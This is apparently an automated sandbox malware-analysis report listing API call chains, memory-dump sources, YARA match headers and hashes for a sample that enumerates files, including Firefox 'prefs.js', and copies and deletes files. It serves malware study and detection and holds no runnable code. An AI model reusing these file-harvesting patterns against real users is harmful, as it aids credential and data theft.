                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s$%s\%s$%s\*
                                                  • API String ID: 180737720-445461498
                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B33B33
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B33B4A
                                                  • lstrcat.KERNEL32(?,?), ref: 00B33B9C
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B33BAE
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B33BC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B33ECE
                                                  • FindClose.KERNEL32(000000FF), ref: 00B33EE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 1125553467-0
                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction ID: e3fb5d22718869cf19de6ce6ff4a15564bcf1d0f63dee752e3b2734d0fb13cff
                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction Fuzzy Hash: 3EA17CB6A40218ABDB30DBA4DC85FEE73B9FB49700F1445C8B60D96141EB759B84CF62
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                  • wsprintfA.USER32 ref: 004145A6
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                  • lstrcatA.KERNEL32(?,0086C040,?,00000104), ref: 004146C5
                                                  • lstrcatA.KERNEL32(?,0086B078), ref: 004146D8
                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 13328894-2848263008
                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B34B93
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B34BAA
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B34BD8
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B34BEE
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B34DE4
                                                  • FindClose.KERNEL32(000000FF), ref: 00B34DF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction ID: 63055327a5abe9808d4ac03eb6cbb35fdb6fcb7fd4a26b7d966b42603be6d56f
                                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction Fuzzy Hash: 6B6175B5940218ABCB24EBE0DD45FEA73BDFB59700F0045C8B50992141EB75AB45CF91
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B2C15C
                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B2C1B4
                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B2C1CA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2CA26
                                                  • FindClose.KERNEL32(000000FF), ref: 00B2CA38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                  • Instruction ID: ce2fc135b262d0a5adce4b0193b666cf6f7bf99a20d09bdd53ac8832db2eccd9
                                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                  • Instruction Fuzzy Hash: 57425272900114ABCB14FBB0DD96EED77B9AF95300F6045E8B54AA6091EF349F48CF92
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00413EC3
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 180737720-4073750446
                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B347E7
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B347EE
                                                  • wsprintfA.USER32 ref: 00B3480D
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B34824
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B34852
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B34868
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B348F2
                                                  • FindClose.KERNEL32(000000FF), ref: 00B34907
                                                  • lstrcat.KERNEL32(?,0064A524), ref: 00B3492C
                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 00B3493F
                                                  • lstrlen.KERNEL32(?), ref: 00B3494C
                                                  • lstrlen.KERNEL32(?), ref: 00B3495D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                  • String ID:
                                                  • API String ID: 671575355-0
                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction ID: 4ed5c1e1bb0abc3b94cd6eb2617230a5a39fb81769376c7270a96391796e3921
                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction Fuzzy Hash: C65186B9580218ABC720EBB0DD89FED73BDEB54300F4045C8F64992190EB759B84CF92
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B3412A
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B34141
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B3416F
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B34185
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B342D3
                                                  • FindClose.KERNEL32(000000FF), ref: 00B342E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction ID: e6252775c439095cee4dd9fe20266b24a2b4c9ca19410fd06dc1361c30cf6233
                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction Fuzzy Hash: 165163B6900218BBCB24FBB0DD85EEA73BDFB55300F0045C8B64992040EB75AB858F95
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\*.*
                                                  • API String ID: 180737720-1013718255
                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID: 4@$\*.*
                                                  • API String ID: 2325840235-1993203227
                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: prefs.js
                                                  • API String ID: 3334442632-3783873740
                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 1415058207-1173974218
                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B2EFA5
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B2EFBC
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 00B2F012
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B2F028
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2F515
                                                  • FindClose.KERNEL32(000000FF), ref: 00B2F52A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction ID: 1158901caeb41cc0561eedd1acea218bdfb89dc8425d96b5f9aae7b294716eac
                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction Fuzzy Hash: 60E10672911218ABDB18FB60DD91EEEB3B9AF55700F6051E9B04A62052EF305FC9CF52
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B2DD52
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B2DD9A
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B2DDB0
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E033
                                                  • FindClose.KERNEL32(000000FF), ref: 00B2E045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction ID: ed62cfee958d65f0488c79857b2c1b3e1a49a43a597d7e2d0675b42293a0416a
                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction Fuzzy Hash: D3918873900214ABCB14FBB0ED56DED73BDAF96301F6046ECB44A96151EE349B18CB92
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
